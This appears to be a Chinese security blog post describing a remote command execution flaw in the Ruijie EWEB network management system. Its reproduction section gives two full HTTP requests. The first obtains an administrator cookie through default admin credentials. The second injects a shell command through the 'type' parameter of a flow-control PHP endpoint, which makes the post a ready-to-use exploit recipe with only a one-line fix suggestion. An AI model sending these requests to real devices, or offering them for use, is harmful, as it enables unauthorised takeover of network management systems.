锐捷EWEB网管系统RCE漏洞
抠脚大汉在网络 2024-08-21 13:33:02 阅读 100
文章目录
免责声明漏洞描述漏洞原理影响版本漏洞复现修复建议
免责声明
该文章只为学习和交流,请不要做违法乱纪的事情,如有与本人无关
漏洞描述
锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以"数据时代创新网管与信息安全"为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。
漏洞原理
在该系统的/flow_control_pi/flwo.control.php的文件中存在命令执行参数
影响版本
不详
漏洞复现
用post请求访问/ddi/server/login.php页面并提交admin参数可以获得管理员的cookie
<code>POST /ddi/server/login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
username=admin&password=admin?
使用cookie向/flow_control_pi/flwo.control.php?a=getFlowGroup 提交type参数
<code>POST /flow_control_pi/flwo.control.php?a=getFlowGroup HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=q6g97tqc32rl4bl8h89gjub031; user=admin;
Accept-Encoding: gzip
Connection: close
type=|bash+-c+'ping+-c+4+ip'
修复建议
升级到最新版本
声明
本文内容仅代表作者观点,或转载于其他网站,本站不以此文作为商业用途
如有涉及侵权,请联系本站进行删除
转载本站原创文章,请注明来源及作者。